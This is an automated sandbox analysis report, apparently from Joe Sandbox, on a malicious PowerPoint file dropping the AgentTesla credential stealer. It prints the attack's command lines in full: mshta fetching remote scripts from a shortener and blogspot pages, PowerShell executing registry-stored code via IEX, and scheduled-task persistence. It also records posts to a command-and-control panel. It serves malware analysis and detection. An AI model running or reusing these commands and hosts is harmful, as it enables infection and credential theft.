
Analysis Report BankSwiftCopyUSD95000.ppt

Overview

General Information

Sample Name: BankSwiftCopyUSD95000.ppt
Analysis ID: 339086
MD5: 7f0b415d0b7a76530b2f510a910811e5
SHA1: 480594ad26c91dd9d719c80334285375540dc83e
SHA256: 8d3e1d1a1775191a33980069f500e37f22bdcd0a1ad3544ab4a9d0a651fbd019
Tags: ppt


Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Powershell execute code from registry
Sigma detected: Schedule script from internet via mshta
Yara detected AgentTesla
.NET source code contains very large array initializations
Connects to a URL shortener service
Connects to a pastebin service (likely for C&C)
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • POWERPNT.EXE (PID: 1464 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding MD5: EBBBEF2CCA67822395E24D6E18A3BDF6)
  • cmd.exe (PID: 1276 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt' MD5: AD7B9C14083B52BC532FBA5948342B98)
    • POWERPNT.EXE (PID: 2476 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt' MD5: EBBBEF2CCA67822395E24D6E18A3BDF6)
      • PING.EXE (PID: 2776 cmdline: ping.exe MD5: 5FB30FE90736C7FC77DE637021B1CE7C)
      • mshta.exe (PID: 2756 cmdline: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 2816 cmdline: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
          • MSBuild.exe (PID: 2720 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 7FB523211C53D4AB3213874451A928AA)
        • schtasks.exe (PID: 3036 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\') MD5: 97E0EC3D6D99E8CC2B17EF2D3760E8FC)
        • cmd.exe (PID: 2340 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • taskkill.exe (PID: 956 cmdline: taskkill /f /im winword.exe MD5: 3722FA501DCB50AE42818F9034906891)
          • taskkill.exe (PID: 1620 cmdline: taskkill /f /im EXCEL.exe MD5: 3722FA501DCB50AE42818F9034906891)
      • PING.EXE (PID: 2720 cmdline: ping.exe MD5: 5FB30FE90736C7FC77DE637021B1CE7C)
  • taskeng.exe (PID: 2168 cmdline: taskeng.exe {2ABF5983-E6CF-46DC-B95A-53E1F6F4D156} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • mshta.exe (PID: 2368 cmdline: C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
      • mshta.exe (PID: 600 cmdline: 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 288 cmdline: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • mshta.exe (PID: 848 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).meather)|IEX'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
    • powershell.exe (PID: 2796 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)|IEX MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • mshta.exe (PID: 2468 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://backbones1234511a.blogspot.com/p/stback1.html'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
    • mshta.exe (PID: 2236 cmdline: 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 1776 cmdline: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • mshta.exe (PID: 592 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://startthepartyup.blogspot.com/p/backbone14.html'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
    • mshta.exe (PID: 2224 cmdline: 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html MD5: 95828D670CFD3B16EE188168E083C3C5)
  • mshta.exe (PID: 532 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://ghostbackbone123.blogspot.com/p/ghostbackup13.html'', 0 : window.close') MD5: 95828D670CFD3B16EE188168E083C3C5)
    • mshta.exe (PID: 2112 cmdline: 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000000C.00000002.2281127990.00000000048E4000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000021.00000002.2354098697.0000000004834000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000001D.00000002.2291584431.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000018.00000002.2370323670.0000000004854000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
29.2.MSBuild.exe.400000.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Powershell execute code from registry
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, CommandLine: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, CommandLine|base64offset|contains: z+, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, ProcessId: 2816
Sigma detected: Schedule script from internet via mshta
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\'), CommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\'), CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\'), ProcessId: 3036
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started; Author: Michael Haag; Data: Command: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, CommandLine: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, CommandLine|base64offset|contains: z+, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2756, ProcessCommandLine: 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX, ProcessId: 2816
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, CommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt', ParentImage: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, ParentProcessId: 2476, ProcessCommandLine: mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv, ProcessId: 2756

Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: BankSwiftCopyUSD95000.ppt; Avira: detected
Multi AV Scanner detection for submitted file
Source: BankSwiftCopyUSD95000.ppt; Virustotal: Detection: 34%
Source: BankSwiftCopyUSD95000.ppt; ReversingLabs: Detection: 21%
Machine Learning detection for sample
Source: BankSwiftCopyUSD95000.ppt; Joe Sandbox ML: detected
Source: unknown; HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49183 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49184 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.22:49193 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49206 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49210 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown; HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49192 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49200 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49208 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49213 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49215 version: TLS 1.2
Source: Binary string: Managament.inf.pdb source: powershell.exe, 0000000C.00000002.2287134514.0000000006951000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 0000000C.00000002.2254678756.0000000002B60000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE; Process created: C:\Windows\System32\PING.EXE
Source: powerpnt.exe; Memory has grown: Private usage: 0MB later: 10MB
Source: global traffic; DNS query: name: j.mp
Source: global traffic; TCP traffic: 192.168.2.22:49168 -> 108.177.127.132:443
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 67.199.248.16:80

Networking:

Connects to a URL shortener service
Source: unknown; DNS query: name: j.mp
Connects to a pastebin service (likely for C&C)
Source: unknown; DNS query: name: paste.ee (6 identical events)
Uses ping.exe to check the status of other devices and networks
Source: unknown; Process created: C:\Windows\System32\PING.EXE ping.exe
Source: Joe Sandbox View; IP Address: 172.67.219.133 (2 entries)
Source: Joe Sandbox View; IP Address: 67.199.248.16 (2 entries)
Source: Joe Sandbox View; ASN Name: GOOGLE-PRIVATE-CLOUDUS
Source: Joe Sandbox View; JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View; JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic; HTTP traffic detected: GET /dbgghasdnasdjasgdakgsdhv HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: j.mp | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 | Content-Type: application/x-www-form-urlencoded | Host: 64.188.18.218 | Content-Length: 368 | Expect: 100-continue | Connection: Keep-Alive (2 identical events)
Source: global traffic; HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 | Content-Type: application/x-www-form-urlencoded | Host: 64.188.18.218 | Content-Length: 368 | Expect: 100-continue (13 identical events)
Source: unknown; TCP traffic detected without corresponding DNS query: 64.188.18.218 (50 identical events)
Source: C:\Windows\System32\mshta.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmp; String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comt\ equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp; String found in binary or memory: Content-Security-Policy: script-src 'self' *.google.com *.google-analytics.com 'unsafe-inline' 'unsafe-eval' *.gstatic.com *.googlesyndication.com *.blogger.com *.googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; report-uri /cspreport equals www.youtube.com (Youtube)
Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmp; String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp; String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown; DNS traffic detected: queries for: j.mp
Source: unknown; HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 | Content-Type: application/x-www-form-urlencoded | Host: 64.188.18.218 | Content-Length: 368 | Expect: 100-continue | Connection: Keep-Alive
Source: mshta.exe, 00000006.00000002.2308801585.0000000005947000.00000004.00000001.sdmp; String found in binary or memory: Https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=pi
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp; String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp; String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp; String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp; String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp; String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp; String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp; String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp; String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
              Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: http://csi.gstatic.com/csi
              Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
              Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: http://j.mp/
              Source: mshta.exe, 00000006.00000003.2264502398.00000000003F5000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269237459.0000000000430000.00000004.00000020.sdmpString found in binary or memory: http://j.mp/dbgghasdnasdjasgdakgsdhv
              Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
              Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gs
              Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
              Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
              Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/g
              Source: mshta.exe, 00000006.00000002.2307607404.0000000005853000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
              Source: mshta.exe, 00000006.00000003.2250091244.0000000003B4B000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt05
              Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0C
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/BlogPosting
              Source: mshta.exe, 00000006.00000002.2280946216.0000000004230000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2249204389.0000000002220000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
              Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
              Source: mshta.exe, 00000006.00000002.2280946216.0000000004230000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2249204389.0000000002220000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2231119435.0000000004080000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
              Source: mshta.exe, 00000006.00000003.2242124105.00000000075EA000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2243633505.0000000008621000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308627180.000000000592E000.00000004.00000001.sdmpString found in binary or memory: http://www.blogger.com/go/cookiechoices
